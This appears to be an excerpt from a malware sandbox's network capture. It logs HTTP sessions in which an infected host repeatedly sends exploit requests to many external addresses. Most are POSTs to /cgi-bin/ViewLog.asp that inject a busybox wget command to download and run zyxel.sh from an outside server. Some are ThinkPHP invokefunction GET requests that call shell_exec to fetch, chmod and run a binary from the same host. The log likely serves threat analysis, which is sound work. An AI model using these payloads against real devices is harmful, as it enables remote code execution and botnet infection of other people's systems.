                                                              Nov 13, 2023 22:19:36.007030010 CET11873OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              591192.168.2.236024094.120.52.138080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:36.195059061 CET11879OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              592192.168.2.235872494.120.5.258080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:36.200690031 CET11879OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              593192.168.2.235363431.13.170.1058080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:36.496958017 CET11892OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:36.798717022 CET11900INHTTP/1.1 403 Forbidden
                                                              Date: Mon, 13 Nov 2023 21:19:36 GMT
                                                              Server: server
                                                              X-XSS-Protection: 1; mode=block
                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                              X-Frame-Options: SameOrigin
                                                              X-Content-Type-Options: nosniff
                                                              Content-Length: 402
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 73 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /cgi-bin/ViewLog.aspon this server.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>server Server at 192.168.0.14 Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              594192.168.2.2334988112.213.125.13280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:36.509100914 CET11892OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:36.830044031 CET11962INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:36 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              595192.168.2.233919231.136.16.1188080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:36.523921967 CET11895OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:37.512801886 CET12013OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:39.496494055 CET12252OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:43.687954903 CET12737OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:51.622919083 CET13787OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:07.492897987 CET15801OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:40.000483036 CET19860OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              596192.168.2.235987494.120.24.2018080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:36.530678034 CET11896OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              597192.168.2.235679895.164.242.1238080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:38.104763031 CET12109OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:38.318905115 CET12119INHTTP/1.1 400 Bad Request
                                                              Server: squid/3.5.27
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 21:19:38 GMT
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Length: 3558
                                                              X-Squid-Error: ERR_INVALID_URL 0
                                                              Vary: Accept-Language
                                                              Content-Language: en
                                                              X-Cache: MISS from ubuntu
                                                              X-Cache-Lookup: NONE from ubuntu:8080
                                                              Via: 1.1 ubuntu (squid/3.5.27)
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              598192.168.2.2344168112.165.143.13580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:38.159383059 CET12110OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:38.467454910 CET12133INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              599192.168.2.233872894.122.90.08080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:38.235666037 CET12115OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              6192.168.2.235645688.218.105.580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:00.986412048 CET424OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:01.214880943 CET432INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:01 GMT
                                                              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              60192.168.2.233997488.77.160.13780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:17.602149963 CET2238OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:17.917573929 CET2313INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:14 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              600192.168.2.234000294.121.97.598080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:38.238878012 CET12116OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              601192.168.2.234339694.121.156.348080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:38.238997936 CET12116OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
